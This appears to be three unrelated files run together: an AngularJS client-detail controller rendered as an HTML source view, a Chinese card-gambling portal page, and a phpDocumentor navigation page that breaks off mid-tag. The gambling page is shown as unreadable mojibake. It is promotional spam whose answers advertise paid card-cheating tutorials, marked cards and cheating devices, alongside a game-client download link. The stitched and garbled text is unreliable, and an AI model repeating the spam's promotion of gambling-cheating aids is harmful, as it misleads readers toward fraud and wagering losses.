I-SAN-dev/amanuensis
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>The source code</title> <link href="../resources/prettify/prettify.css" type="text/css" rel="stylesheet" /> <script type="text/javascript" src="../resources/prettify/prettify.js"></script> <style type="text/css"> .highlight { display: block; background-color: #ddd; } </style> <script type="text/javascript"> function highlight() { document.getElementById(location.hash.replace(/#/, "")).className = "highlight"; } </script> </head> <body onload="prettyPrint(); highlight();"> <pre class="prettyprint lang-js"><span id='ama-controllers-ClientDetailCtrl'>/** </span> * @class ama.controllers.ClientDetailCtrl * Controller for the client detail view. */ app.controller(&#39;ClientDetailCtrl&#39;, [&#39;ApiAbstractionLayer&#39;, &#39;LocalStorage&#39;, &#39;$scope&#39;, &#39;$stateParams&#39;, &#39;DeleteService&#39;, &#39;MasterDetailService&#39;, &#39;PanelService&#39;, &#39;btfModal&#39;, function (ApiAbstractionLayer, LocalStorage, $scope, $stateParams, DeleteService, MasterDetailService, PanelService, btfModal) { var self = this; <span id='ama-controllers-ClientDetailCtrl-property-showPage'> /** </span> * @type {integer} * Indicates which panel should be shown. Initially set by the {@link ama.services.PanelService PanelService} */ this.showPage = PanelService.getPanel(&#39;clients&#39;); MasterDetailService.setDetail(this); <span id='ama-controllers-ClientDetailCtrl-property-genders'> /** </span> * A list of available genders with their respective id (&#39;f&#39; for female, &#39;m&#39; for male) * @type {{name: string, id: string}[]} */ this.genders = [ { name: &#39;clients.contactGender.male&#39;, id: &#39;m&#39; }, { name: &#39;clients.contactGender.female&#39;, id: &#39;f&#39; } ]; var calls = 0; <span id='ama-controllers-ClientDetailCtrl-method-getClient'> /** </span> * Gets a client from the API * @param {integer} id The client id to query for */ var getClient = function(id) { self.client = LocalStorage.getData(&#39;client&#39;+&#39;/&#39;+id); ApiAbstractionLayer(&#39;GET&#39;, {name:&#39;client&#39;, params: {id:id}}).then(function (data) { LocalStorage.setData(&#39;client&#39;+&#39;/&#39;+id, data); self.client = data; }); }; <span id='ama-controllers-ClientDetailCtrl-property-showProjects'> /** </span> * a flag indicating if the client&#39;s projects should be shown or not. *Deprecated.* * @type {boolean} */ this.showProjects = false; <span id='ama-controllers-ClientDetailCtrl-method-getProjects'> /** </span> * gets the projects associated with the client specified by param id * @param id - the client&#39;s id */ var getProjects = function (id) { self.projects = LocalStorage.getData(&#39;client/&#39;+id+&#39;/projects&#39;); self.projectStatistics = LocalStorage.getData(&#39;client/&#39;+id+&#39;/statistics&#39;) ApiAbstractionLayer(&#39;GET&#39;, {name:&#39;project&#39;,params:{client: id}}).then(function (data) { self.projects = data.list; self.projectStatistics = data.info; LocalStorage.setData(&#39;client/&#39;+id+&#39;/projects&#39;, data.list); LocalStorage.setData(&#39;client/&#39;+id+&#39;/statistics&#39;, data.info); }); }; // call getClient when the detail view is requested <span id='ama-controllers-ClientDetailCtrl-method-detailChanged'> /** </span> * Reacts on a change of the client detail. Triggered by the {@link ama.directives.masterDetail masterDetail directive}. * @param {Object} data The newly selected client */ this.detailChanged = function(data){ calls += 1; console.log(calls); self.client = data; getClient(data.id); getProjects(data.id); }; // if the client state is entered with a certain id, we want to set the client detail for this id if($stateParams.id){ MasterDetailService.notifyController(&#39;setDetail&#39;,{id:$stateParams.id}); } // the next few lines contain code to create a new client - client_data connection <span id='ama-controllers-ClientDetailCtrl-property-newConnectionFlag'> /** </span> * Object of flags indicate if we currently want to add a new client data of its type (phone/mail/fax) * TODO: do this dynamically * @type {{phone: boolean, mail: boolean, fax: boolean}} */ this.newConnectionFlag = { phone: false, mail: false, fax: false }; <span id='ama-controllers-ClientDetailCtrl-method-setNewConnectionFlag'> /** </span> * Toggles the flag for the newConnection creation mode * @param {string} type Identifier of the type of client data */ this.setNewConnectionFlag = function(type) { self.newConnectionFlag[type] = !self.newConnectionFlag[type]; }; <span id='ama-controllers-ClientDetailCtrl-property-newConnection'> /** </span> * A simple object containing any possible new client data * with (initially) empty names and values. * Bound to input fields in the view. * @deprecated As fax works without this, we don&#39;t seem to need it. * TODO: create this dynamically * @property newConnection * @type {{phone: {name: string, value: string}, mail: {name: string, value: string}}} */ // this.newConnection = { phone: { name: &#39;&#39;, value: &#39;&#39; }, mail: { name: &#39;&#39;, value: &#39;&#39; } }; <span id='ama-controllers-ClientDetailCtrl-method-addConnection'> /** </span> * Performs a database request to add a new client - client_data connection of a certain type * @param {string} type Identifier of the type of client_data to be created */ this.addConnection = function(type) { var name = self.newConnection[type].name; var value = self.newConnection[type].value; var data = { clientid: self.client.id, datatype: type, name: name, value: value }; // Post to the API ApiAbstractionLayer(&#39;POST&#39;, {name: &#39;client_data&#39;, data: data}).then(function (data) { self.setNewConnectionFlag(type); var conns = self.client.data[type]; if(conns) { conns.push({id: data.id, name: name, value: value}); } else { self.client.data[type] = [{id: data.id, name: name, value: value}]; } LocalStorage.setData(&#39;client/&#39;+self.client.id, self.client); self.newConnection[type].name = &#39;&#39;; self.newConnection[type].value = &#39;&#39;; }); }; <span id='ama-controllers-ClientDetailCtrl-method-connectionDeleted'> /** </span> * Updates the view and the cache after a client - client_data connection was deleted * @param updatedList - the updated list of client_data which doesn&#39;t contain the deleted item */ this.connectionDeleted = function (updatedList) { self.client.data = updatedList; LocalStorage.setData(&#39;client/&#39;+self.client.id, self.client); }; <span id='ama-controllers-ClientDetailCtrl-method-deleteClient'> /** </span> * Deletes the current client */ this.deleteClient = function () { MasterDetailService.notifyMaster(&#39;deleteClient&#39;, self.client.id); }; <span id='ama-controllers-ClientDetailCtrl-method-removeCategory'> /** </span> * Removes a category with a given catid from the client * @param catid - the id of the category to be removed from the client */ this.removeCategory = function(catid) { var apiObject = { name: &#39;client_categories&#39;, data: { id: catid, clientid: this.client.id } }; ApiAbstractionLayer(&#39;DELETE&#39;, apiObject).then(function (data) { if(data.success) { delete self.client.categories[catid]; } }); }; <span id='ama-controllers-ClientDetailCtrl-method-makeMailDefault'> /** </span> * Makes the mail with the given id the default mail address * @param id - the id of the mailaddress */ this.makeMailDefault = function(id) { var mailAdresses = self.client.data.mail; var i = 0, j = 0, k= 0; var iStopped = false, jStopped = false; while(i&lt;mailAdresses.length) { if(mailAdresses[i].id!=id &amp;&amp; !jStopped) j++; else jStopped = true; if(mailAdresses[i].isdefault == &quot;0&quot; &amp;&amp; ! iStopped) k++; else iStopped = true; if(iStopped &amp;&amp; jStopped){ break; } else { i++; } } ApiAbstractionLayer(&#39;POST&#39;, {name:&#39;client_data&#39;, data:{id:mailAdresses[k].id, isdefault:&quot;0&quot;}}).then(function () { self.client.data.mail[k].isdefault = &quot;0&quot;; ApiAbstractionLayer(&#39;POST&#39;, {name:&#39;client_data&#39;, data:{id:id, isdefault:&quot;1&quot;}}).then(function () { self.client.data.mail[j].isdefault = &quot;1&quot;; LocalStorage.setData(&#39;client/&#39;+self.client.id, self.client); }); }); }; <span id='ama-controllers-ClientDetailCtrl-method-addProject'> /** </span> * Adds a project to the current client */ this.addProject = function () { var apiObject = { name: &#39;project&#39;, data: { name: self.newProject.name, description: self.newProject.description, client: self.client.id } }; ApiAbstractionLayer(&#39;POST&#39;, apiObject).then(function (data) { LocalStorage.setData(&#39;project/&#39;+data.id, data); var clientProjects = LocalStorage.getData(&#39;client/&#39;+self.client.id+&#39;/projects&#39;) || []; clientProjects.push(data); LocalStorage.setData(&#39;client/&#39;+self.client.id+&#39;/projects&#39;, clientProjects); self.newProject = null; self.projects = clientProjects; var projectList = LocalStorage.getData(&#39;currentProjects&#39;); if(projectList){ projectList.push(data); LocalStorage.setData(&#39;projects&#39;, projectList); } self.showPage = 2; }); }; <span id='ama-controllers-ClientDetailCtrl-method-openCategoryModal'> /** </span> * Opens a modal with a list of all available client categories * and handles adding/removal of categories to the current client */ this.openCategoryModal = function(){ var categoriesBackup = angular.copy(self.client.categories); var selectedCategories = []; var unSelectedCategories = []; var allCategories = LocalStorage.getData(&#39;clientCategories&#39;); ApiAbstractionLayer(&#39;GET&#39;, &#39;client_categories&#39;).then(function (data) { for(var i = 0; i&lt;data.length; i++){ if (categoriesBackup[data[i].id]) { data[i].selected = true; selectedCategories.push(data[i]); } } allCategories = data; var modal = btfModal({ templateUrl: &#39;templates/pages/clients/categoryDialog.html&#39;, <span id='ama-controllers-ClientCategoriesDialog'> /** </span> * @class ama.controllers.ClientCategoriesDialog * Controller for the modal being opened via {@link ama.controllers.ClientDetailCtrl#openCategoryModal the openCategoryModal function in ClientDetailCtrl} */ controller: function(){ var cats = this; if(allCategories.length &gt; 0){ cats.showPage = 1; } else { cats.showPage = 2; } this.filterText = &#39;&#39;; <span id='ama-controllers-ClientCategoriesDialog-property-allCategories'> /** </span> * An object containing all available categories * @type {string|Object|*} */ this.allCategories = allCategories; var resetNewCategory = function () { return { name: &#39;&#39;, description: &#39;&#39; }; }; <span id='ama-controllers-ClientCategoriesDialog-property-newCategory'> /** </span> * @type {Object} * Contains a category to be sent to the API for creation */ this.newCategory = resetNewCategory(); <span id='ama-controllers-ClientCategoriesDialog-method-toggleSelectCategory'> /** </span> * Toggles the selection of a category * @param category - the category to be toggled */ this.toggleSelectCategory = function (category) { var indexSelect = selectedCategories.indexOf(category); var indexUnselect = unSelectedCategories.indexOf(category); var indexAll = cats.allCategories.indexOf(category); if(indexSelect != -1){ selectedCategories.splice(indexSelect,1); unSelectedCategories.push(category); console.log(unSelectedCategories); delete self.client.categories[category.id]; } else { if(indexUnselect != -1) unSelectedCategories.splice(indexUnselect,1); selectedCategories.push(category); self.client.categories[category.id] = category.name; } if(cats.allCategories[indexAll].selected){ cats.allCategories[indexAll].selected = false; } else { cats.allCategories[indexAll].selected = true; } }; <span id='ama-controllers-ClientCategoriesDialog-method-addCategory'> /** </span> * Creates a new category and adds it to the current client as well as the list of categories */ this.addCategory = function(){ if(cats.newCategory.name){ ApiAbstractionLayer(&#39;POST&#39;, {name: &#39;client_categories&#39;, data: cats.newCategory},true).then(function (data) { cats.allCategories.push(data); cats.toggleSelectCategory(data); LocalStorage.setData(&#39;clientCategories&#39;, cats.allCategories); cats.newCategory = resetNewCategory(); cats.showPage = 1; }); } }; var deleteFirstAppearance = function (array, id) { for(var i=0; i&lt;array.length; i++){ if(array[i].id == id){ array.splice(i,1); return true; } } return false; }; <span id='ama-controllers-ClientCategoriesDialog-method-deleteCategory'> /** </span> * Deletes a client category by given id * @param id - the id of the category to be deleted */ this.deleteCategory = function (id) { // we do not use the deleteService as we are already inside a modal ApiAbstractionLayer(&#39;DELETE&#39;, {name: &#39;client_categories&#39;, data: {id:id}}, true).then(function () { for(var i = 0; i &lt; allCategories.length; i++){ if(allCategories[i].id == id){ var inBackup = false; if(allCategories[i].selected){ inBackup = deleteFirstAppearance(selectedCategories, id); delete self.client.categories[id]; } else { inBackup = deleteFirstAppearance(unSelectedCategories, id); } if(inBackup){ deleteFirstAppearance(categoriesBackup, id); } break; } } allCategories.splice(i,1); LocalStorage.setData(&#39;clientCategories&#39;,allCategories); }); }; <span id='ama-controllers-ClientCategoriesDialog-method-accept'> /** </span> * Adds new and removes old categories from the client and closes the modal. */ this.accept = function () { console.log(unSelectedCategories); if(selectedCategories.length &gt; 0) { for (var i = 0; i &lt; selectedCategories.length; i++) { if(!categoriesBackup[selectedCategories[i].id]) ApiAbstractionLayer(&#39;POST&#39;, { name: &#39;client_categories&#39;, data: {id: selectedCategories[i].id, clientid: self.client.id} }); } } if(unSelectedCategories.length &gt; 0){ for (var j = 0; j &lt; unSelectedCategories.length; j++){ if(categoriesBackup[unSelectedCategories[j].id]) ApiAbstractionLayer(&#39;DELETE&#39;,{ name: &#39;client_categories&#39;, data: {id: unSelectedCategories[j].id, clientid: self.client.id} }); } } modal.deactivate(); }; <span id='ama-controllers-ClientCategoriesDialog-method-close'> /** </span> * resets the client categories and closes the modal */ this.close = function () { self.client.categories = categoriesBackup; modal.deactivate(); }; }, controllerAs: &#39;categories&#39; }); modal.activate(); }); }; } ] );</pre> </body> </html>
wulu/2015.11.23/qipai/1008/qipaiyouxipingtai/11.html
bylu/Test
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>´òÅÆÍæÈý¹«µÄÓÐÊ²Ã´ÃØ¾÷ÎÈÓ®Âð</title> <meta name="keywords" content="´òÅÆ,Èý¹«,ʲô,ÃØ¾÷,ÎÈÓ®,´òÅÆ,Èý¹«,ʲô,ÃØ¾÷,ÎÈÓ®," /> <meta name="description" content="´òÅÆÍæÈý¹«µÄÓÐÊ²Ã´ÃØ¾÷ÎÈÓ®Âð???? 1´ð£ºÄãµã¿ªÎÒÃû×Ö£¬È»ºóµã¡¶²é¿´¸ü¶à¡· ÔÚÓұߵIJ»ÊÇÉϱßÄǸö¡¶²é¿´¸ü¶à¡·£¬µã¿ª¡¶²é¿´¸ü¶à¡·ºóÔÚ¿´ÓÒ±ßÓÐÒ»¸öÊղؼǼÀïÃæÓÐÒ»Ì×ǧÊõµÄ½Ìѧ×ÊÁÏ£¬¼ÇÅÆ£¬Ï´ÅÆ£¬·¢ÅÆ£¬¿ØÅƵÄʲô¶¼ÓУ¬½²½âµÃºÜÇå³þ¡£²»¹ýÊÇÊշѵģ¬ÎÒÒÔǰ" /> <LINK rel=stylesheet type=text/css href="/qipai/templets/default/style/style.css"> <LINK rel=stylesheet type=text/css href="/qipai/templets/default/style/p.css"> <BODY> <DIV class=top> <DIV class=c_960> <DIV class=top-nav><SPAN>Hi£¬»¶Ó­À´µ½789ÓÎÏ·ÖÐÐÄ£¡</SPAN></DIV> <DIV><!-- logo --> <DIV style="POSITION: relative" class=logo><A href="http://www.789game.com"></A></DIV> <DIV class=nav> <UL> <LI><a href="http://www.789game.com" target="_blank">ÍøÕ¾Ê×Ò³</a></LI> <li><a href='/qipai/qipaiyouxipingtai/' target="_blank" >ÆåÅÆÓÎϷƽ̨</a></li> <li><a href='/qipai/doudizhu/' target="_blank" >¶·µØÖ÷¼¼ÇÉ</a></li> <li><a href='/qipai/xiangqi/' target="_blank" >ÏóÆå¼¼ÇÉ</a></li> <li><a href='/qipai/buyu/' target="_blank" >²¶ÓãÓÎÏ·</a></li> <li><a href='/qipai/douniujiqiao/' target="_blank" >¶·Å£¼¼ÇÉ</a></li> <li><a href='/qipai/majiangjiqiao/' target="_blank" >Â齫¼¼ÇÉ</a></li> </UL></DIV><!-- µ¼º½À¸½áÊø --></DIV></DIV></DIV> <div style="BORDER: #cdcdcd 1px solid; margin-top:10px; width:960px; margin:5px auto"><img src="/qipai/templets/default/images/960X424.jpg" width="960" height="424"></div> <div class="main"> <DIV id=p_con><!--Ò³Ãæ×ó²à²¿·Ö ¿ªÊ¼ --> <DIV class=p_l> <DIV class=location><IMG src="/qipai/templets/default/images/flag.png" width=16 height=16> µ±Ç°Î»ÖÃ:</strong><a href='/qipai'>ÆåÅÆÓÎÏ·</a> > <a href='/qipai/qipaiyouxipingtai/'>ÆåÅÆÓÎϷƽ̨</a> > </DIV> <DIV id=pnlContent> <H1 class=que-title>´òÅÆÍæÈý¹«µÄÓÐÊ²Ã´ÃØ¾÷ÎÈÓ®Âð</H1> <DIV class=que-content> <p> ´òÅÆÍæÈý¹«µÄÓÐÊ²Ã´ÃØ¾÷ÎÈÓ®Âð????</p> <p> 1´ð£ºÄãµã¿ªÎÒÃû×Ö£¬È»ºóµã¡¶²é¿´¸ü¶à¡· ÔÚÓұߵIJ»ÊÇÉϱßÄǸö¡¶²é¿´¸ü¶à¡·£¬µã¿ª¡¶²é¿´¸ü¶à¡·ºóÔÚ¿´ÓÒ±ßÓÐÒ»¸öÊղؼǼÀïÃæÓÐÒ»Ì×ǧÊõµÄ½Ìѧ×ÊÁÏ£¬¼ÇÅÆ£¬Ï´ÅÆ£¬·¢ÅÆ£¬¿ØÅƵÄʲô¶¼ÓУ¬½²½âµÃºÜÇå³þ¡£²»¹ýÊÇÊշѵģ¬ÎÒÒÔǰÂò¹ýÒ»Ì׿´¹ýºÜ²»´íµÄ¡£</p> <p> 2´ð£ºÈý¹«ÊµÕ½¼¼ÇÉÓÐÊÖ·¨¼¼Êõ£¬Õâ¸öÒª×Ô¼ºÂýÂýÁ·Ï°×ÁÄ¥£¬ÁíÍâÒ»ÖÖÊǵÀ¾ßÅäºÏ£¬µÀ¾ßÓзּ¸ÖֱȽÏʵÓãºÒ»£¬ÃÜÂëħÊõÆË¿Ë£¬¿´ÆË¿Ë±³ÃæµÄÃÜÂë±ê¼ÇÆË¿ËµÄµãÊýºÍ»¨É«¡£¶þ£¬ÓÃħÊõµÀ¾ßÒÇÆ÷£¬Õâ¸ö´¿Êôɵ¹Ïʽ²Ù×÷£¬Ëü»á½ÌÄãÔõô·¢ÅÆ£¬ÊµÕ½ÐÔºÜÇ¿¡£</p> <p> 3´ð£º¸ÃÈý¹«ÓÎÏ·ÖУ¬Íæ¼ÒÈËÊýΪ2-6ÈË£¬ÓÎÏ·¿ªÊ¼ºóϵͳ»á¸øÃ¿Î»Íæ¼Ò·¢ËÍÈýÕÅÅÆ£¬È»ºóÿ¸öÍæ¼ÒÁ½Á½Ï໥±È½ÏÅÆµÄ´óС£¬²¢¸ù¾ÝÅÆÐÍÅжÏÃ¿Î»Íæ¼ÒµÄÊäÓ®ÒÔ¼°¼ÆËãÍæ¼ÒµÄÊäÓ®¡£ÔÚ¸ÃÈý¹«ÓÎÏ·ÖУ¬Íæ¼ÒÈËÊýΪ2-6ÈË£¬ÓÎÏ·¿ªÊ¼ºóϵͳ»á¸øÃ¿Î»Íæ¼Ò·¢ËÍÈýÕÅÅÆ£¬È»ºó...</p> <p> 4´ð£º1 £®ÓÎÏ·¹æÔò °ÙÈËÈý¹«ÓÎÏ·ÖУ¬Íæ¼ÒÈËÊý¶àΪ°ÙÈË£¬ ËüʹÓÃÒ»¸±ÆË¿ËÅÆÖеÄ52ÕÅÅÆ£¨´óСÍõ³ýÍ⣩£¬ÆäÖÐÅÆÕÅA£­9Ö®¼äµÄÕâÐ©ÅÆÎªµãÊýÅÆ£¬ÅÆÕÅ10ΪÊý×ÖÅÆ£½0µãÅÆ£¬ÅÆÕÅJ¡¢Q¡¢K¡¢Îª¹«ÅÆ¡£ÓÎϷΪÎå¸öÈËÍæ£¬Ò»·½Îª×¯¼Ò£¬ÁíÌì¡¢µØ¡¢Ç¬¡¢À¤ËÄ·½ÎªÏмң¬´ý...</p> <p> 5´ð£º&ldquo;Èý¹«&rdquo;£¬¾ÍÊǽ«ÆË¿ËÅÆÈ¥µô´óСÍõ£¬Ê£ÏÂÅÆÃ¿ÈËÅÉÁ½ÕÅ£¬×ÀÃæÒ»ÕŹ«¹²ÅÆ£¬½«´ó¼ÒÊÖÉÏÁ½ÕÅÅÆÓ빫¹²ÅÆ¼ÓÆðÀ´£¬¶ÄµãÊý´óС£¬Áãµã×îС£¨¹ã¶«»°½ÐÂéÉ´£©£»8µãÁ½±¶£»9µãÈý±¶£»Èý¹«4±¶£»ÈýÌõÎå±¶£»3Ìõ3×î´ó£¬·­6±¶¡£Èý¹«ÓÐÁ½ÖÖÍæ·¨£¬Ò»ÊÇ̨ÍåÈý¹«£¬Ò»ÊÇ´ó...</p> <p> 6´ð£ºÓïÑÔÒýµ¼ËäÈ»¿ÉÒÔÈÃÄãÓÐʱ¼ä×öһЩС¶¯×÷£¬³£Óеİ취ÊÇÓÃÆäËüµÄ¶¯×÷À´Òý¿ª¹ÛÖÚµÄÊÓÏß¡£±ÈÈçÒ»ÖÖÕý·´Ï´ÅÆ£¬×óÊÖ°ëµþÅÆÅÆÃæÏòÏ£¬Ö»ÓÐ×îÏÂÃæÒ»ÕÅÅÆÊÇÅÆ±»ÏòÏ£¬ÅÆÃæÏòÉÏ£¬ÓÒÊÖÅÆÕý³£¡£ ÏÖÔÚÍæÈý¹«±íÑÝÕߺܳ£ÓõÄÒ»ÖÖ·½·¨ÊǹÛÖÚÁÄÌì¡£ÔÚÓë¹ÛÖÚÁÄÌì...</p> <p> 7´ð£ºÔËÆø£¬ÊÖÆø¡£ ¶¼²»ºÃµÄ»°¾Í²»´ò</p> <p> 8´ð£ºÈý¹«ÓÎϷʹÓÃÒ»¸±ÆË¿ËÅÆÖеÄ52ÕÅÅÆ£¨´óСÍõ³ýÍ⣩£¬ÆäÖÐÅÆÕÅA£­9Ö®¼äµÄÕâÐ©ÅÆÎªµãÊýÅÆ£¬ÅÆÕÅ10ΪÊý×ÖÅÆ=0µãÅÆ£¬ÅÆÕÅJ¡¢Q¡¢K¡¢Îª¹«ÅÆ¡£ÏµÍ³¸øÃ¿Î»Íæ¼Ò·¢ÍêÈýÕÅÅÆºó£¬½«ÒÀ´Î±È½Ï×Ô¼ºÓëÆäËûÍæ¼ÒµÄÅÆÐÍ£¬Ã¿ÖÖÅÆÐͶ¼ÓÐ×Ô¼ºµÄ¹æ¶¨ÅÆÐͱ¶Êý¡£ÔڱȽÏÅÆÐÍ...</p> </DIV> <DIV class=pre-nex>ÉÏһƪ£º<a href='/qipai/qipaiyouxipingtai/10.html'>Íþº£ÐÅÏ¢¸ÛÔ¶º½ÓÎÏ·ÖÐÐÄ</a> &nbsp;&nbsp;&nbsp;&nbsp;ÏÂÒ»Ìõ£ºÏÂһƪ£º<a href='/qipai/qipaiyouxipingtai/12.html'>»¶ÀÖ¶·µØÖ÷ͼ±êÔõôµãÁÁ</a> </DIV></DIV> </DIV> <DIV class=p_r_xiazai><DIV class=r_ad> <DIV class=dl_client_v2> <A style="BACKGROUND-POSITION: 22px -536px" class=client_dl title=ÏÂÔØ¿Í»§¶Ë rel=nofollow href="http://down.789game.net/download/789gameCenter.exe" ></A></DIV></DIV></div> <DIV class=p_r> <DL class=box_dl> <DT>ÍÆ¼öÎÄÕÂ</DT> <DD><a href="/qipai/qipaiyouxipingtai/55.html">ÓÆÔÕÆåÅÆÓÎÏ·ÖÐÐÄ´óÌü¹Ù·½ÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/48.html">Ãû²©ÆåÅÆ¹ÙÍø-Ãû²©ÆåÅÆÔõôÑùÏÂ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/27.html">̩ɽÆåÅÆ¹ÙÍøÓÎÏ·ÖÐÐÄ-̩ɽÆåÅÆ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/26.html">998ÓÎÏ·¹ÙÍø-998ÓÎÏ·ÖÐÐÄ´óÌü¹Ù</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/22.html">ÔõôÏÂÔØ¹óÈËÆåÅÆÓÎÏ·´óÌü£¿</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/23.html">°®ÍæÆåÅÆÓÎÏ·´óÌü,°®ÍæÆåÅÆÓÎÏ·</a> </DD> </DL> <DL class=box_dl> <DT>×îÈÈÎÄÕÂ</DT> <DD><a href="/qipai/qipaiyouxipingtai/17.html">°²»Õ±ß·æÓÎÏ·¶·µØÖ÷</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/43.html">Ãû²©¹ú¼ÊÆåÅÆÓÎÏ·ÖÐÐÄÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/66.html">ÆåÅÆÐ¡ÓÎÏ·ÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/89.html">ÆåÅÆÒ»ÆðÀÖÓÎÏ·ÖÐÐÄÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/37.html">Ãâ·ÑµÄÆåÅÆÓÎÏ·¹Ù·½ÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/47.html">ÒÚÀÖÆåÅÆ´óÌü¹Ù·½ÏÂÔØÖÐÐÄ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/54.html">ÞÄ·¢ÆåÅÆ´óÌü¹Ù·½ÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/73.html">ÆåÅÆ¹ÜÀíÖÆ¶È</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/67.html">ÆåÅÆÒ»ÌõÁú¹Ù·½ÍøÕ¾ÓÎÏ·ÏÂÔØ</a> </DD> <DD><a href="/qipai/qipaiyouxipingtai/88.html">½ð»ÍÆåÅÆ¹Ù·½ÍøÕ¾ÓÎÏ·´óÌüÏÂÔØ</a> </DD> </DL><DIV class=tags> <DL class=box_dl> <DT>ÓÎÏ·½éÉÜ</DT> <DIV class=tags> <A href="http://www.789game.com/GameRulesShow.aspx?XID=203" target="_blnak">ˮ䰴«</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=2040" target="_blank">нð󸲶Óã</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=6" target="_blank">789Ó®ÈýÕÅ</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=361" target="_blank">¶þÈËÂ齫</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=102" target="_blank">¶þÈ˶·Å£</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=27" target="_blank">ËÄÈ˶·Å£</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=200" target="_blank">¶·µØÖ÷</A> <A href="http://www.789game.com/GameRulesShow.aspx?XID=2010" target="_blank">ÀîåÓÅüÓã</A></DIV></DL></DIV> </DIV> </DIV><!--Ò³ÃæÓҲಿ·Ö ½áÊø --></DIV> </DIV> <DIV class=footer> µÖÖÆ²»Á¼ÓÎÏ·&nbsp;&nbsp;¾Ü¾øµÁ°æÓÎÏ·&nbsp;&nbsp;×¢Òâ×ÔÎÒ±£»¤&nbsp;&nbsp;½÷·ÀÊÜÆ­Éϵ±&nbsp;&nbsp;ÊʶÈÓÎÏ·ÒæÄÔ&nbsp;&nbsp;³ÁÃÔÓÎÏ·ÉËÉí&nbsp;&nbsp;ºÏÀí°²ÅÅʱ¼ä&nbsp;&nbsp;ÏíÊܽ¡¿µÉú»î <BR> 789ÓÎÏ·ÖÐÐÄ Ô¥ICP±¸12014032ºÅ-1 ±¸°¸ÎĺÅ:ÎÄÍøÓα¸×Ö[2011]C-CBG002ºÅ<BR>¿Í·þQQ£º4000371814 ¿Í·þÈÈÏߣº4000371814 <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fde6684532de22a1b45cd44b14141ff07' type='text/javascript'%3E%3C/script%3E")); </script> </DIV> </BODY></HTML>
docs/namespaces/global.html
btafoya/SqueakyMindsPhpHelper
<!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"> <meta charset="utf-8"> <title>SqueakyMindsPhpHelper » global</title> <meta name="author" content="Mike van Riel"> <meta name="description" content=""> <link href="../css/template.css" rel="stylesheet" media="all"> <script src="../js/jquery-1.7.1.min.js" type="text/javascript"></script><script src="../js/jquery-ui-1.8.2.custom.min.js" type="text/javascript"></script><script src="../js/jquery.mousewheel.min.js" type="text/javascript"></script><script src="../js/bootstrap.js" type="text/javascript"></script><script src="../js/template.js" type="text/javascript"></script><script src="../js/prettify/prettify.min.js" type="text/javascript"></script><link rel="shortcut icon" href="../img/favicon.ico"> <link rel="apple-touch-icon" href="../img/apple-touch-icon.png"> <link rel="apple-touch-icon" sizes="72x72" href="../img/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="114x114" href="../img/apple-touch-icon-114x114.png"> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"><div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></a><a class="brand" href="../index.html">SqueakyMindsPhpHelper</a><div class="nav-collapse"><ul class="nav"> <li class="dropdown"> <a href="#api" class="dropdown-toggle" data-toggle="dropdown"> API Documentation <b class="caret"></b></a><ul class="dropdown-menu"> <li><a>Packages</a></li> <li><a href="../packages/SqueakyMindsPhpHelper.html"><i class="icon-folder-open"></i> SqueakyMindsPhpHelper</a></li> <li><a href="../packages/SqueakyMindsPhpHelper_lists.html"><i class="icon-folder-open"></i> SqueakyMindsPhpHelper_lists</a></li> </ul> </li> <li class="dropdown" id="charts-menu"> <a href="#charts" class="dropdown-toggle" data-toggle="dropdown"> Charts <b class="caret"></b></a><ul class="dropdown-menu"><li><a href="../graph_class.html"><i class="icon-list-alt"></i> Class hierarchy diagram</a></li></ul> </li> <li class="dropdown" id="reports-menu"> <a href="#reports" class="dropdown-toggle" data-toggle="dropdown"> Reports <b class="caret"></b></a><ul class="dropdown-menu"> <li><a href="../errors.html"><i class="icon-remove-sign"></i> Errors  <span class="label label-info">0</span></a></li> <li><a href="../markers.html"><i class="icon-map-marker"></i> Markers  <ul></ul></a></li> <li><a href="../deprecated.html"><i class="icon-stop"></i> Deprecated elements  <span class="label label-info">0</span></a></li> </ul> </li> </ul></div> </div></div> <div class="go_to_top"><a href="#___" style="color: inherit">Back to top  <i class="icon-upload icon-white"></i></a></div> </div> <div id="___" class="container"> <noscript><div class="alert alert-warning"> Javascript is disabled; several features are only available if Javascript is enabled. </div></noscript> <div class="row"> <div class="span4"> <div class="btn-group view pull-right" data-toggle="buttons-radio"> <button class="btn details" title="Show descriptions and method names"><i class="icon-list"></i></button><button class="btn simple" title="Show only method names"><i class="icon-align-justify"></i></button> </div> <ul class="side-nav nav nav-list"> <li class="nav-header"> <i class="icon-map-marker"></i> Namespaces</li> <li> <span class="empty-namespace"><i class="icon-stop"></i>global</span><ul class="nav nav-list 